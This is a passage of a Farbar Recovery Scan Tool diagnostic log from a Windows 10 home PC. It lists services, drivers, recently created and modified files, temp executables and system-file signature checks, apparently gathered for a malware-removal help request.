R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [351120 2015-07-18] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
S3 PAExec; C:\Windows\PAExec.exe [190464 2014-10-18] (Power Admin LLC) [File not signed]
R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [145256 2011-08-02] (Nuance Communications, Inc.)
R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [54272 2015-12-18] (Razer Inc.) [File not signed]
R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-11-05] ()
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1750712 2015-06-16] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2102496 2015-06-16] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [224712 2015-07-24] (Safer-Networking Ltd.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
S2 Hamachi2Svc; D:\LogMeIn\hamachi-2.exe -s [X]
S2 jhi_service; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe" [X]
S2 LMS; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe" [X]
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-29] (Advanced Micro Devices, Inc.)
R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [22240 2013-10-28] ()
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29168 2015-07-02] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [89944 2015-07-02] (Avast Software s.r.o.)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2015-07-02] (Avast Software s.r.o.)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65736 2015-07-02] ()
S1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1047320 2015-07-02] (Avast Software s.r.o.)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [442264 2015-07-02] (Avast Software s.r.o.)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [137288 2015-07-02] (Avast Software s.r.o.)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [272248 2015-07-02] ()
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-09-18] (Advanced Micro Devices)
S3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2015-11-12] (LogMeIn Inc.)
S3 LADF_DHP2; C:\Windows\system32\DRIVERS\ladfDHP2amd64.sys [62168 2010-09-29] (Logitech)
S3 LADF_SBVM; C:\Windows\system32\DRIVERS\ladfSBVMamd64.sys [377176 2010-09-29] (Logitech)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech)
R3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Logitech Inc.)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [895256 2015-06-23] (Realtek )
S3 rzdaendpt; C:\Windows\System32\drivers\rzdaendpt.sys [43720 2015-08-14] (Razer Inc)
S3 rzendpt; C:\Windows\System32\drivers\rzendpt.sys [50392 2015-08-14] (Razer Inc)
R3 rzmpos; C:\Windows\System32\drivers\rzmpos.sys [48840 2015-08-14] (Razer Inc)
R2 rzpmgrk; C:\WINDOWS\system32\drivers\rzpmgrk.sys [37184 2015-09-23] (Razer, Inc.)
R2 rzpnk; C:\WINDOWS\system32\drivers\rzpnk.sys [130880 2015-12-15] (Razer, Inc.)
S3 rzvkeyboard; C:\Windows\System32\drivers\rzvkeyboard.sys [44232 2015-08-14] (Razer Inc)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
R2 VBoxAswDrv; C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [273824 2015-07-02] (Avast Software)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
R3 XtuAcpiDriver; C:\Windows\System32\drivers\XtuAcpiDriver.sys [63840 2015-06-06] (Intel Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-02-29 20:46 - 2016-02-29 20:46 - 00028580 _____ C:\Users\Kym\Desktop\FRST.txt
2016-02-29 20:43 - 2016-02-29 20:46 - 00000000 ____D C:\FRST
2016-02-29 20:39 - 2016-02-29 20:39 - 00002342 _____ C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2016-02-29 20:39 - 2016-02-29 20:39 - 00000207 _____ C:\WINDOWS\tweaking.com-regbackup-KYM-PC-Windows-10-Home-(64-bit).dat
2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\RegBackup
2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\Program Files (x86)\Tweaking.com
2016-02-29 20:38 - 2016-02-29 20:40 - 05198336 _____ (AVAST Software) C:\Users\Kym\Desktop\aswMBR.exe
2016-02-29 20:38 - 2016-02-29 20:39 - 00016377 _____ C:\WINDOWS\Tweaking.com - Registry Backup Setup Log.txt
2016-02-29 20:36 - 2016-02-29 20:43 - 02371072 _____ (Farbar) C:\Users\Kym\Desktop\FRST64.exe
2016-02-29 20:35 - 2016-02-29 20:38 - 04777232 _____ (Tweaking.com) C:\Users\Kym\Downloads\tweaking.com_registry_backup_setup.exe
2016-02-29 20:32 - 2016-02-29 20:32 - 00016148 _____ C:\WINDOWS\system32\KYM-PC_Kym_HistoryPrediction.bin
2016-02-29 19:37 - 2016-02-29 20:31 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2016-02-29 19:34 - 2016-02-29 19:34 - 00000000 ____D C:\WINDOWS\pss
2016-02-28 21:02 - 2016-01-08 22:44 - 00000822 _____ C:\WINDOWS\system32\Drivers\etc\hosts.20160228-210203.backup
2016-02-28 18:59 - 2016-02-28 18:59 - 00000000 ____D C:\Program Files\Common Files\AV
2016-02-28 18:50 - 2016-02-28 21:01 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-02-28 18:50 - 2016-02-28 20:23 - 00001494 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2016-02-28 18:50 - 2016-02-28 18:50 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2016-02-28 18:50 - 2015-06-16 17:32 - 00020760 _____ (Safer-Networking Ltd.) C:\WINDOWS\system32\sdnclean64.exe
2016-02-28 18:04 - 2016-02-28 18:48 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Kym\Downloads\spybot-2.4.exe
2016-02-26 06:50 - 2016-02-26 06:50 - 00002378 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-26 00:30 - 2016-02-26 06:49 - 00000000 ____D C:\Users\Kym\AppData\Local\Deployment
2016-02-26 00:30 - 2016-02-26 00:30 - 00000000 ____D C:\Users\Kym\AppData\Local\Apps\2.0
2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Sun
2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\Oracle
2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\.oracle_jre_usage
2016-02-21 16:39 - 2016-02-21 16:39 - 00000000 ____D C:\ProgramData\0342bcb1-0de3-0
2016-02-21 16:34 - 2016-02-21 16:34 - 00003878 _____ C:\WINDOWS\System32\Tasks\{9DCFB73E-9A6F-ACFC-B0BC-4203F9A4BD3D}
2016-02-21 16:34 - 2016-02-21 16:34 - 00000000 ____D C:\ProgramData\3c355888
2016-02-21 16:34 - 2016-02-21 16:34 - 00000000 ____D C:\ProgramData\0342bcb1-60e1-0
2016-02-21 16:33 - 2016-02-21 16:33 - 00000000 ____D C:\ProgramData\{21b5474a-312c-0}
2016-02-21 16:33 - 2016-02-21 16:33 - 00000000 ____D C:\ProgramData\{0b5d3910-112c-1}
2016-02-18 15:04 - 2016-02-18 17:51 - 00000000 ____D C:\Users\Kym\Documents\Kalyani
2016-02-15 19:06 - 2016-02-15 19:06 - 00223232 _____ C:\Users\Kym\Downloads\Archibald Prize 2015 information.pdf
2016-02-15 13:32 - 2016-02-15 13:32 - 00281328 _____ C:\WINDOWS\Minidump\021516-19125-01.dmp
2016-02-13 19:16 - 2016-02-13 19:19 - 00000000 ____D C:\Users\Kym\AppData\Local\FullTiltPoker
2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Party
2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\cef-cache
2016-02-13 19:00 - 2016-02-13 19:00 - 00000683 _____ C:\Users\Public\Desktop\Full Tilt Poker.lnk
2016-02-13 19:00 - 2016-02-13 19:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Full Tilt Poker
2016-02-13 18:11 - 2016-02-13 19:00 - 00877888 _____ C:\Users\Kym\Downloads\PartyPokerSetup.exe
2016-02-13 18:10 - 2016-02-13 18:59 - 73087280 _____ C:\Users\Kym\Downloads\FullTiltSetup.exe
2016-02-13 18:10 - 2016-02-13 18:10 - 00877888 _____ C:\Users\Kym\Downloads\Unconfirmed 937642.crdownload
2016-02-10 23:28 - 2016-01-31 16:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 23:28 - 2016-01-31 16:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-10 23:28 - 2016-01-31 16:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-02-10 23:28 - 2016-01-31 16:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 23:28 - 2016-01-31 16:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 23:28 - 2016-01-31 16:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-02-10 23:28 - 2016-01-31 15:38 - 21873152 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-02-10 23:28 - 2016-01-31 15:33 - 24593920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-02-10 23:28 - 2016-01-31 15:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 23:28 - 2016-01-31 15:26 - 06787072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-02-10 23:28 - 2016-01-31 15:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-10 23:28 - 2016-01-31 15:25 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-02-10 23:28 - 2016-01-31 15:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 23:28 - 2016-01-31 15:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-10 23:28 - 2016-01-31 15:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-10 23:28 - 2016-01-31 15:11 - 05156352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-02-10 23:28 - 2016-01-31 15:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 23:28 - 2016-01-31 15:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-02-10 23:27 - 2016-01-31 16:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 23:27 - 2016-01-31 16:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 23:27 - 2016-01-31 16:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 23:27 - 2016-01-31 16:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 23:27 - 2016-01-31 15:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-02-10 23:27 - 2016-01-31 15:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
2016-02-10 23:27 - 2016-01-31 15:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
2016-02-10 23:27 - 2016-01-31 15:25 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-02-10 23:27 - 2016-01-31 15:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-02-10 23:27 - 2016-01-31 15:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 23:27 - 2016-01-31 15:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 23:27 - 2016-01-31 15:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-02-10 23:27 - 2016-01-31 15:24 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-02-10 23:27 - 2016-01-31 15:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 23:27 - 2016-01-31 15:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-02-10 23:27 - 2016-01-31 15:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 23:27 - 2016-01-31 15:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-10 23:27 - 2016-01-31 15:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-02-10 23:27 - 2016-01-31 15:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
2016-02-10 23:27 - 2016-01-31 15:18 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-02-10 23:27 - 2016-01-31 15:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 23:27 - 2016-01-31 15:17 - 19324928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-02-10 23:27 - 2016-01-31 15:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 23:27 - 2016-01-31 15:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-02-10 23:27 - 2016-01-31 15:14 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-02-10 23:27 - 2016-01-31 15:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
2016-02-10 23:27 - 2016-01-31 15:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-10 23:27 - 2016-01-31 15:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 23:27 - 2016-01-31 15:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 23:27 - 2016-01-31 15:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 23:27 - 2016-01-31 15:07 - 18802176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-02-10 23:27 - 2016-01-31 15:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 23:27 - 2016-01-31 15:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 23:27 - 2016-01-31 15:05 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-02-10 23:27 - 2016-01-31 15:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 23:27 - 2016-01-31 15:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 23:27 - 2016-01-31 15:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 23:27 - 2016-01-31 14:59 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-02-10 23:27 - 2016-01-31 14:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-09 22:56 - 2016-02-09 22:56 - 00281328 _____ C:\WINDOWS\Minidump\020916-19296-01.dmp
2016-02-09 03:29 - 2016-02-09 03:29 - 00001277 _____ C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CNext.lnk
2016-02-09 03:28 - 2016-02-09 03:28 - 00004296 _____ C:\WINDOWS\System32\Tasks\AMD Updater
2016-02-09 03:25 - 2016-02-13 19:16 - 00000000 ____D C:\Users\Kym\AppData\Local\AMD
2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2016-02-09 03:20 - 2016-02-09 03:23 - 322471624 _____ (AMD Inc.) C:\Users\Kym\Downloads\radeon-crimson-15.12-win10-64bit.exe
2016-02-08 02:13 - 2016-02-08 02:13 - 00000202 _____ C:\Users\Kym\Desktop\Tom Clancy's Rainbow Six Siege.url
2016-02-06 01:02 - 2016-02-28 20:24 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\uTorrent
2016-02-03 19:16 - 2016-02-03 19:16 - 06253170 _____ C:\Users\Kym\Downloads\1776 - Donkey Kong Country 2 (U)(Independent).zip
2016-02-03 19:07 - 2016-02-03 19:08 - 11918630 _____ C:\Users\Kym\Downloads\2214 - Donkey Kong Country 3 (E)(Rising Sun).zip
2016-02-03 19:06 - 2016-02-03 19:06 - 02981626 _____ C:\Users\Kym\Downloads\Donkey Kong Country 2 - Diddy's Kong Quest (USA) (En,Fr) (Rev A).zip
2016-02-03 19:04 - 2016-02-03 19:04 - 05642942 _____ C:\Users\Kym\Downloads\1055 - Donkey Kong Country (U)(Evasion).zip
2016-02-02 12:22 - 2016-02-02 12:22 - 00000000 ____D C:\Users\Kym\Documents\MIsc
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-02-29 20:42 - 2014-10-12 20:42 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-02-29 20:37 - 2015-08-09 01:28 - 01011482 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-29 20:37 - 2015-07-10 21:02 - 00000000 ____D C:\WINDOWS\INF
2016-02-29 20:35 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-02-29 20:32 - 2015-08-09 01:48 - 00000000 __SHD C:\Users\Kym\IntelGraphicsProfiles
2016-02-29 20:32 - 2015-08-09 01:27 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-02-29 20:32 - 2015-07-10 22:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-02-29 20:32 - 2014-09-10 20:01 - 00003804 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2016-02-29 20:32 - 2014-05-02 21:01 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-29 20:31 - 2015-07-10 19:05 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-02-29 19:06 - 2014-05-02 21:01 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-29 12:23 - 2015-07-10 21:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-28 21:23 - 2014-05-02 22:28 - 00000000 ____D C:\Users\Kym\AppData\Roaming\uTorrent
2016-02-28 18:06 - 2015-12-25 19:32 - 00004144 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5957CCCD-7167-42EC-BDE9-58F86B871E77}
2016-02-28 17:59 - 2014-05-02 21:43 - 00004280 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
2016-02-26 00:31 - 2015-08-09 11:27 - 00000000 ____D C:\Users\Kym\AppData\Local\MicrosoftEdge
2016-02-25 23:54 - 2009-07-14 15:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-02-25 23:38 - 2015-04-09 16:31 - 00000000 ____D C:\Users\Kym\Documents\Outlook Files
2016-02-25 23:16 - 2015-08-09 01:29 - 00000000 ____D C:\Users\Kym
2016-02-25 23:16 - 2014-10-18 18:59 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-25 22:43 - 2014-10-18 18:43 - 00000000 ____D C:\AMD
2016-02-21 16:34 - 2015-12-24 16:50 - 00000000 ____D C:\ProgramData\3af26a8e-45f1-1
2016-02-21 16:34 - 2015-12-24 16:50 - 00000000 ____D C:\ProgramData\3af26a8e-3475-0
2016-02-19 20:02 - 2015-03-12 22:56 - 00000000 ____D C:\Users\Kym\AppData\Local\Spotify
2016-02-19 20:01 - 2015-03-12 22:54 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Spotify
2016-02-18 21:54 - 2016-01-16 18:56 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-02-18 00:33 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-02-16 19:47 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\rescache
2016-02-16 19:24 - 2014-05-25 16:10 - 00000000 ____D C:\Users\Kym\AppData\Local\ElevatedDiagnostics
2016-02-15 20:11 - 2015-08-09 01:48 - 00000000 ____D C:\Users\Kym\AppData\Local\Packages
2016-02-15 13:32 - 2015-09-27 23:34 - 00000000 ____D C:\WINDOWS\Minidump
2016-02-13 19:10 - 2014-11-20 11:53 - 00000000 ____D C:\Users\Kym\AppData\Local\PokerStars
2016-02-13 13:57 - 2015-07-10 23:14 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-12 19:44 - 2015-08-08 23:54 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2016-02-12 19:42 - 2015-07-10 20:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-12 19:42 - 2009-07-14 12:34 - 00000478 _____ C:\WINDOWS\win.ini
2016-02-12 19:41 - 2014-05-04 15:26 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-12 19:37 - 2014-05-04 15:26 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-09 03:30 - 2014-09-29 14:52 - 00000000 ____D C:\Program Files (x86)\Raptr
2016-02-09 03:25 - 2015-08-09 01:27 - 00000000 ____D C:\Program Files\AMD
2016-02-09 03:25 - 2015-02-12 08:41 - 00000000 ____D C:\Program Files (x86)\AMD
2016-02-09 03:19 - 2014-09-22 17:29 - 00000000 ____D C:\ProgramData\AMD
2016-02-08 23:26 - 2015-11-28 22:42 - 00000000 ____D C:\Users\Kym\AppData\Local\Ubisoft Game Launcher
2016-02-08 16:30 - 2014-09-02 15:05 - 00000000 ____D C:\Users\Kym\Documents\My Games
2016-02-08 16:17 - 2015-08-09 01:28 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-03 08:47 - 2015-07-10 21:06 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-02-03 08:47 - 2015-07-10 21:06 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-02-02 17:01 - 2014-05-02 21:01 - 00003978 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-02 17:01 - 2014-05-02 21:01 - 00003746 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-02-01 22:21 - 2014-10-03 09:28 - 00000000 ____D C:\Users\Kym\Documents\Bond
2016-02-01 21:47 - 2014-05-02 21:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
==================== Files in the root of some directories =======
2015-09-08 19:17 - 2015-09-08 19:17 - 0000000 _____ () C:\Program Files (x86)\ATI Technologies
2015-08-14 11:25 - 2015-08-14 11:25 - 0000000 _____ () C:\Program Files (x86)\Common Files\AMD
2014-07-23 14:06 - 2015-02-19 13:45 - 0000953 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Settings.ini
2014-07-23 17:57 - 2015-08-09 01:04 - 0000028 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Usage.ini
2015-05-21 11:30 - 2015-05-21 11:31 - 0001062 _____ () C:\Users\Kym\AppData\Roaming\SpeedRunnersLog.txt
2014-05-02 20:55 - 2014-08-28 11:18 - 0007599 _____ () C:\Users\Kym\AppData\Local\Resmon.ResmonCfg
2015-06-18 16:22 - 2015-06-18 16:27 - 0000260 _____ () C:\ProgramData\csgobm.project
2015-06-18 16:22 - 2015-06-18 16:27 - 0000002 _____ () C:\ProgramData\csgobm2.project
2015-06-18 16:19 - 2015-06-18 16:19 - 0010299 _____ () C:\ProgramData\csgobmbacked.cfg
2015-06-18 16:19 - 2015-06-18 16:19 - 0000077 _____ () C:\ProgramData\csgobmsettings.ini
2015-08-09 01:27 - 2015-08-09 01:27 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
Files to move or delete:
====================
C:\Users\Kym\IP_Log_Data.js
C:\Users\Kym\Network_Meter_Data.js
Some files in TEMP:
====================
C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe
C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe
C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe
C:\Users\Kym\AppData\Local\Temp\readSTILog.dll
C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe
C:\Users\Kym\AppData\Local\Temp\tmp5300.exe
C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe
C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
